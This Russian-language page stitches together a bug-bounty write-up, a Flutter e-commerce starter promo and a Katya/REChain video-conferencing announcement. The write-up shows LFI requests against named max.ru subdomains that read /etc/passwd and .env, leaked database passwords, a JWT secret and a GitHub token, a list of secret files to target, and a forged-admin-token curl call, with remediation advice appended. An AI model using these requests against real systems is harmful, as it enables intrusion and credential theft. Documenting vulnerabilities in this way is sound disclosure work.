📺 Видео с PoC: YouTube
📂 Архив с доказательствами: Yandex Disk

1️⃣ Этап 1 — Рекогносцировка

Начав с классического рекона, я искал параметры, которые могут работать с файловыми путями.
На поддоменах:

• business.max.ru
• help.max.ru

нашёл параметр file, который явно подгружал файлы с сервера.

Тест-запрос:

GET https://business.max.ru/?file=/etc/passwd HTTP/1.1
Host: business.max.ru
User-Agent: Mozilla/5.0
Accept: */*

Ответ (фрагмент):

root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Вывод: нет фильтрации, нет валидации, полный LFI.

2️⃣ Этап 2 — Поиск «золотых файлов»

После подтверждения LFI приоритет был очевиден — искать файлы, содержащие пароли, ключи и токены.

Файл Что хранит Чем опасен .env Переменные окружения JWT_SECRET, доступ к БД, API-ключи config.php Конфигурация PHP-приложения Подключение к БД .git/config Настройки git-репозитория URL и токены для приватных репо /proc/self/environ Переменные окружения процесса Runtime-секреты database.php Данные для подключения к БД Полный доступ к данным

Запрос на .env:

GET https://help.max.ru/?file=/.env HTTP/1.1
Host: help.max.ru
User-Agent: curl/7.68.0
Accept: */*

Ответ (усечён):

APP_ENV=production
DB_HOST=db.max.ru
DB_USER=max_prod
DB_PASSWORD=Sup3rS3cretPass
JWT_SECRET=4a9c9b8f8d2a46f83d8e70f...
GIT_TOKEN=ghp_7d9f4a8321b...

3️⃣ Этап 3 — Извлечение секретов

Из этих файлов были получены:

• JWT_SECRET — ключ подписи токенов авторизации
• DB_USER / DB_PASSWORD — доступ к продакшн-БД
• GitHub Token — чтение и запись в приватные репозитории
• API Keys — ключи к сторонним сервисам

4️⃣ Этап 4 — Эксплуатация JWT_SECRET

Секрет подписи JWT дал возможность:

1. Подделывать токены любого пользователя (включая админов)
2. Повторно использовать (token replay) уже действующие токены
3. Получать доступ к приватным эндпоинтам API без логина и пароля

PoC-запрос:

curl -H "Authorization: Bearer forged_admin_token" \
     https://api.oneme.ru/api/user

Результат:
Ответ с приватными данными пользователя без прохождения авторизации.

5️⃣ Этап 5 — Полная цепочка атаки

Сценарий выглядел так:

1. LFI на *.max.ru → доступ к .env
2. Извлечение JWT_SECRET и других секретов
3. Форжинг токена с правами администратора
4. Доступ к API → просмотр, изменение, удаление данных
5. GitHub Token → скачивание приватного кода
6. Возможный доступ к внутренним сервисам через API-ключи

6️⃣ MITRE ATT&CK

• T1005 — Data from Local System
• T1552.001 — Unsecured Credentials: Environment Variables
• T1078 — Valid Accounts
• T1550.003 — Use of Web Tokens

7️⃣ CVSS 3.1

Вектор:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Оценка: 9.0 (Critical)

• AV:N — доступно по сети
• AC:L — низкая сложность
• PR:N — не требует авторизации
• UI:N — не требует действий пользователя
• S:C — затрагивает другие компоненты
• C:H/I:H/A:H — критическое влияние на все параметры

8️⃣ Риски

• Полная компрометация API
• Утечка критических секретов
• Доступ к приватным репозиториям
• Возможные атаки на внутреннюю инфраструктуру

9️⃣ Рекомендации

1. Фильтрация параметров — белые списки путей, запрет абсолютных/относительных переходов.
2. Закрыть доступ к .env и config.php на уровне веб-сервера.
3. Не хранить продакшн-секреты в коде и окружении, доступном фронтенду.
4. Регулярная ротация ключей и токенов.
5. Мониторинг и алерты по аномальной активности.

10️⃣ Выводы для багхантеров

• LFI часто недооценивают, но в реальности он может открыть все двери.
• Первое, что проверяйте — .env, config.php, .git/.
• Один секрет (например, JWT_SECRET) = полный контроль над системой.
• Думайте цепочками атак, а не отдельными багами.

💡 Ключевая мысль:

Даже одна уязвимость низкого уровня, если её правильно развить, может обернуться катастрофой для бизнеса.

📈 Зачем бренду интеграция с несколькими маркетплейсами

Онлайн-торговля давно вышла за рамки одного магазина.
Присутствие на нескольких площадках:

Расширяет аудиторию — разные маркетплейсы привлекают разные сегменты покупателей.
Увеличивает оборот — больше точек входа = больше продаж.
Снижает риски — падение продаж на одной платформе компенсируется другими.

Но у каждой платформы свой API, свой формат данных и требования. Мы решили эту проблему, создав единый мультиканальный e-commerce стартер на Flutter + Dart.

🛠 Технологии и архитектура

Фронтенд (Flutter):

Web + Mobile (iOS, Android) из одного кода
Мультиязычность (i18n)
Навигация через GoRouter
Адаптивный дизайн под любые устройства

Бэкенд (Dart Shelf):

Лёгкий и быстрый HTTP-сервер
PostgreSQL
JWT-аутентификация (dart_jsonwebtoken)
Модуль интеграции с API маркетплейсов

DevOps:

CI/CD через GitHub Actions
Автодеплой фронтенда на GitHub Pages
Автодеплой бэкенда на Render

🔌 Интеграция с маркетплейсами

1. Wildberries API

    Импорт каталога
    Обновление остатков и цен
    Управление заказами в реальном времени
    Пример: [Wildberries — My Modus](https://www.wildberries.ru/brands/311036101-my-modus)

2. Ozon API

    Автоматическая публикация товаров
    Синхронизация описаний и изображений
    Контроль логистики и доставки

3. La Moda API

    Загрузка fashion-коллекций
    Поддержка сезонных релизов
    Пример: [La Moda — My Modus](https://www.lamoda.ru/cb/355-34325/clothes-zhenskaya-odezhda-mymodusfashion)

💡 Почему Flutter + Dart

Один язык для фронтенда и бэкенда
Flutter даёт нативную скорость на iOS, Android и Web
Shelf — минималистичный, быстрый и легко расширяемый сервер
Меньше времени на разработку, проще поддержка

👥 Для кого этот проект

Fashion-бренды — подключение нескольких маркетплейсов из одного приложения
Агентства — быстрый запуск e-commerce решений для клиентов
Разработчики — готовый стартер, который можно дополнять и расширять

🚀 Как начать

Проект My Modus открыт на GitHub:
🔗 https://github.com/sorydima/MyModusFlutter

Можно:

Форкнуть репозиторий
Добавить новые маркетплейсы (AliExpress, Avito, Яндекс.Маркет)
Внести улучшения через Pull Request

Надеюсь, в 2022 году личные встречи станут намного проще, но потребность в видеозвонках по-прежнему существует, так что давайте посмотрим правде в глаза: они останутся здесь навсегда. Поэтому очень интересно представить первые в мире децентрализованные приложения для голосовой и видеоконференцсвязи, полностью работающие на базе Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network!

Видеозалы

Мы долго ждали этого момента, и, честно говоря, мы очень рады представить вам видеозалы. Это важный шаг на пути к более богатым видео (а вскоре и голосовым) комнатам!

Вот несколько способов его использования:

✅ Новый способ общения с группами людей для более непринужденных чатов в ваших сообществах 🥹

✅ Больше обсуждений водяного охладителя на работе 🤣

✅ Интересный способ пообщаться с друзьями 😎

Так что же можно сделать?

Полная свобода - перетаскивайте участников по кругу, чтобы упорядочить их точно так, как вам нравится, или дважды щелкните, чтобы увеличить масштаб. Супер веселый и интерактивный способ поставить ваших абонентов на место : D

Спотлайт - в качестве альтернативы, позвольте приложению помочь вам управлять вызовом в зависимости от того, кто в данный момент говорит!

Фулл саппорт - мессенджеры Катя 👽 и REChain 🪐 бесплатны и доступны для загрузки на Android, iOS, macOS, Windows, Linux, Chrome OS, Google Wear OS, некоторые модели Smart TV, часть умных девайсов IoT, а также на любом устройстве в любом браузере в виде PWA веб-приложения! (Катя пока недоступна для браузеров, однако PWA-приложение Кати готовится к релизу)

Вызов по ссылке - просто поделитесь ссылкой и вперед!

Гостевые конференции - нет необходимости регистрировать учетную запись, чтобы присоединиться к конференции!

Создание скриншотов - несколько пользователей могут делиться ими одновременно!

Встроенная матричная конференц-связь (MSC3401) - полностью децентрализована; общайтесь с кем угодно в любом месте сети Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network без какой-либо единой точки отказа, контроля или сбоя!

Как это работает?

Katya ® 👽 AI 🧠 REChain 🪐 Blockchain Node Network - это головная реализация собственной голосовой/видеоконференцсвязи на основе матрицы, как определено в предложении по изменению спецификации матрицы MSC3401. Это пошаговое изменение в том, как работает VoIP в сети - расширение нашей матрицы VoIP/видеозвонков 1:1 для поддержки нескольких участников и значительное ускорение настройки вызова за счет переключения transport layers. Если вы хотите знать, что происходит под капотом, ознакомьтесь с докладом Мэтью на CommCon 2021 о распространении вызовов E2EE на многопоточность, чтобы узнать кровавые подробности! 🤓 🤣

Мы будем рады услышать от вас о том, как вы использовали наши приложения, что вам нравится, какие у вас были проблемы и функции, которые вы хотели бы видеть в будущем!

С уважением,

Дмитрий Сорокин,

403 Gone

REChain, Inc

Katya AI, Systems

Katya, Inc

Katya Systems, LLC

REChain Network Solutions